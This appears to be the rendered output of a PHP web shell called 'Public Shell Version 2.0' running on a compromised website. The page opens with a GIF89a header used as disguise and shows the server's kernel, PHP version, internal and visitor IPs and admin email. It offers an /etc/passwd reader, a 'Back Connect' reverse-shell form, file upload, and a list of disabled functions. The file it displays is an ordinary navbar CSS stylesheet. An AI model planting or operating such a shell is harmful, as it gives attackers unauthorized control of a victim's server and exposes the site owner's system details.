GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 3.148.240.165
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/assets/css/headers/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/assets/css/headers/header1.css

/*Header Default
------------------------------------*/





.header {
	z-index:999;
	position:relative;
	border-bottom:solid 2px #eee;

}

.header .navbar {
	margin: 0;
	min-height: inherit;
}


.header .navbar-default {
	border: none;
	background: none;
	background: rgba(85, 85, 85, 0.90);
} 

.header .navbar-collapse {
	position: relative;
	/*max-height: inherit;*/
}

/*Brand*/
.header .navbar-brand { 
	z-index: 2;
	position: relative;
	padding: 1; 
}

/*Navbar*/
.header .navbar-default .navbar-nav > li > a {
	color: #f5f5f5;
	font-size: 12px;
	font-weight:bold;
	padding: 9px 20px;
	text-transform: uppercase;
}
.header .navbar-default .navbar-nav > li > a:hover {
	color: #ffffff;
	background:#999999;
}

.navbar-default .navbar-collapse, .navbar-default .navbar-form {
    border:none;
}
.header .navbar-default .navbar-nav > li > a:focus {
	color: #333333;
}
 
.header .navbar-default .navbar-nav > .active > a {
	color: #333333;
	background: #FFE020;
}

/*Dropdown*/
.header .navbar-right .dropdown-menu {
	right: inherit;
	box-shadow:none
}

.header .navbar .nav > li > a i.icon-angle-down {
	top: -1px;
	left: 1px;
	font-size: 12px;
	position: relative;
	margin: 0 !important;
}
/*Navber Toggle*/
.navbar-toggle,
.navbar-default .navbar-toggle:hover, 
.navbar-default .navbar-toggle:focus {
	color:#ffffff
}
.navbar-default .navbar-toggle {border:none}

.navbar-toggle:hover {
	background: #95A5A6 !important;
}

.navbar-default .navbar-toggle {
	margin-top:15px

}

.navbar-default .navbar-toggle .icon-bar {
	background: #fff;
}

/*Serach Box*/
.header .navbar .search-open {
	right: 0; 
	top: 50px; 
	display: none;
	padding: 14px; 
	position: absolute;
	background: #fcfcfc; 
	border-top: solid 2px #eee;

}

.header .navbar .nav > li > a.search {
	color: #aaa;
	cursor: pointer;
	padding: 8px 8px 10px;
	border-bottom-color: #aaa;
	background: #f7f7f7 !important;
}

.header .navbar .nav > li > a.search:hover {
	color: #FFE020;
	border-bottom-color: #FFE020;
}

.header .navbar .search-open form {
	margin: 0;	
}

.header .navbar a.search [class^="icon-"],
.header .navbar a.search [class*=" icon-"] {
  width: 1.25em;
  text-align: center;
  display: inline-block;
}

.header .navbar a.search [class^="icon-"].icon-large,
.header .navbar a.search [class*=" icon-"].icon-large {
  /* increased font size for icon-large */
  width: 1.5625em;
}

/*Responsive @Media 
------------------------------------*/
@media (min-width: 767px) {
	/*Navbar Collapse*/
	.header .navbar-collapse {
		padding: 0;
	}
	
	
.navbar-nav ul {
background:#ff0000}

	/*Navbar*/
	.header .navbar-nav {
	    bottom: 0;
	    position: absolute;
	    right: 0;
	}

	.header .navbar-default .navbar-nav > li > a,
	.header .navbar-default .navbar-nav > li > a:focus {	
		border-bottom: solid 2px transparent;
	}
 
	.header .navbar-default .navbar-nav > li > a:hover,
	.header .navbar-default .navbar-nav > .active > a {
		background: #FFE020;
		color:#333333;

	}
	

	.header .navbar-default .navbar-nav > li > a,
	.header .navbar-default .navbar-nav > li > a:hover,
	.header .navbar-default .navbar-nav > li > a:focus,	
	.header .navbar-default .navbar-nav > .active > a, 
	.header .navbar-default .navbar-nav > .active > a:hover, 
	.header .navbar-default .navbar-nav > .active > a:focus {
		padding-top:20px;
	}

	.header .navbar-default .navbar-nav > .open > a,
	.header .navbar-default .navbar-nav > .open > a:hover,
	.header .navbar-default .navbar-nav > .open > a:focus {
		background: #FFE020;
		color:#333333
	}
	

	/*Dropdown Menu*/
	.header .dropdown-menu { 
		padding: 0;
		background: #FFE020;	
		border: none;
		color:#333333;
		min-width: 200px;
		border-radius: 0; 
		z-index: 9999 !important;
		border-bottom: solid 2px #687074; 
	}

	.header .dropdown-menu li a { 
		color: #333333; 
		font-size: 13px; 
		font-weight: 400; 
		padding: 6px 20px; 
		border-bottom: solid 1px #FFD030;
	}

	.header .dropdown-menu .active > a,
	.header .dropdown-menu li > a:hover {
		color: #333333;
		filter: none !important;
		background: #FFD030 !important;
		-webkit-transition: all 0.1s ease-in-out;
		-moz-transition: all 0.1s ease-in-out;
		-o-transition: all 0.1s ease-in-out;
		transition: all 0.1s ease-in-out;
	}

	.header .dropdown-menu li > a:focus {
		background:#333333; 
		filter: none !important; 
	}

	/*Search Box*/
	.header .navbar .search-open {
		width: 330px;
	}	
	
	

 
}

@media (max-width: 767px) {
	/*Search Box*/
	.header .navbar .search-open {
		left: 20px; 
		top: inherit;
		bottom: -5px; 
		padding: 15px;
		border-top: none;
		background: none; 
	}	
	.navbar-brand h2{
 	   padding: 12px 0 0 5px; 
}


}


.active_mn{
	background: #999;
	color:#333333;
}


.navbar-brand {
    float: left;
    font-size: 18px;
    line-height: 20px;
    padding: 0px 0 0 5px;
}

Public Shell Version 2.0